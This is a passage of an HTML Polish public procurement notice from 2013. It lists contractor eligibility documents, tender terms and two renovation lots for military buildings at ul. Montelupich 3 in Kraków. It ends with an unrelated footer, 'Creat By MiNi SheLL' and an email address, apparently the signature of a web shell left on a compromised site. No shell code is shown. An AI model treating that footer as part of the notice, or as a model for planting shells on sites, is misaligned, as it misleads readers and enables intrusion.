<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.35wog.pl/przetargi-rok/2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3811, ul. Krakowska 2 Rząska, 30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2013 godzina 10:00, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków
 Kancelaria jawna, budynek nr 1, pokój nr 116 (piętro I) w godzinach 8.00 - 11.15 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont wybranych pomieszczeń 
w budynku nr 16 w kompleksie wojskowym przy ul. Montelupich 3 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Roboty w zakresie branży budowlanej:
wymiana stolarki okiennej wraz z parapetami oraz stolarki drzwiowej wewnętrznej          i zewnętrznej;
remont elewacji budynku;
roboty tynkarskie;
roboty malarskie ;
roboty posadzkarskie;
sucha zabudowa, ścianki działowe, zabudowa rur;
prace remontowe w łazience.

2)	Roboty w zakresie branży sanitarnej:
wymianę wewnętrznej instalacji centralnego ogrzewania
przeróbki wewnętrznej instalacji c.o.
przeróbki węzła cieplnego w budynku
wywiezienie i utylizację gruzu
demontaż istniejących urządzeń sanitarnych
demontaż istniejących instalacji wod.-kan. 
roboty budowlane instalacyjne: przekucia otworów i murowanie bruzd
montaż nowej instalacji
wykonanie izolacji instalacji
wykonanie prób i odbiorów technicznych
montaż urządzeń sanitarnych z wykonaniem sprawdzenia prawidłowości działania

3)	Roboty w zakresie branży elektrycznej:
montaż tablic rozdzielczych,
układanie przewodów,
montaż osprzętu i opraw oświetleniowych,
wykonanie pomiarów elektrycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.44.30.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.43.10.00-7, 45.42.11.52-4, 45.45.30.00-7, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.00.00-3, 45.33.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont wybranych pomieszczeń 
w budynku nr 28 w kompleksie wojskowym przy ul. Montelupich 3 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Roboty w zakresie branży budowlanej:
wymiana stolarki drzwiowej wewnętrznej
roboty tynkarskie
roboty malarskie 
sucha zabudowa, zabudowa rur, ścianki systemowe
roboty posadzkarskie
instalowanie sufitów podwieszanych
2)	Roboty w zakresie branży sanitarnej:
wymianę grzejników i zaworów
drobne przeróbki wewnętrznej instalacji c.o.,
wywiezienie i utylizację gruzu
wymianę białego montażu (baterie, umywalki, pisuary, ustępy, brodziki) wraz 
z osprzętem
montaż podtynkowych zestawów prysznicowych i liniowych odpływów prysznicowych

3)	Roboty w zakresie branży elektrycznej:
wymianę gniazd wtyczkowych, wyłączników
wymianę oświetlenia żarowego na jarzeniowe
montaż wentylatora łazienkowego w kanale wentylacyjnym
wymianę tablicy rozdzielczej wraz z osprzętem
doprowadzenie z korytarza instalacji elektrycznej do pomieszczeń 01, 02  i 011 (2 gniazda wtykowe na każde pomieszczenie)
wywiezienie i utylizację gruzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.44.30.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.43.10.00-7, 45.42.11.52-4, 45.45.30.00-7, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.00.00-3, 45.33.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com